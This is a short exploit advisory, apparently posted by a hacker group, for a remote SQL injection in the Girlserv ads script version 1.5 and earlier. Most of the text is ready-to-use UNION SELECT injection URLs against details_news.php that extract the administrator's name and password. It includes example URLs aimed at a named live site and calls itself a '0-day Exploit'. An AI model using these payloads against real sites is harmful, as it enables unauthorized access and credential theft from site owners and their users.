Girlserv ads <= 1.5 Remote SQL Injection Vulnerability

Found By : Cold z3ro , Cold-z3ro@hotmail.com

Homepages : http://hackteach.org , http://h4ps.com

Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip

For Admin :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
For password :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

Example ;
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

=================================================
0-day Exploit :)
=================================================
Greets : Hackteach members , Pal-hacker.com admins ,  xp10.com members , and
All friend
=============================================
Cold !F iT z3ro , No One Equal One
=============================================

#Long life Palestine
#http://hackteach.org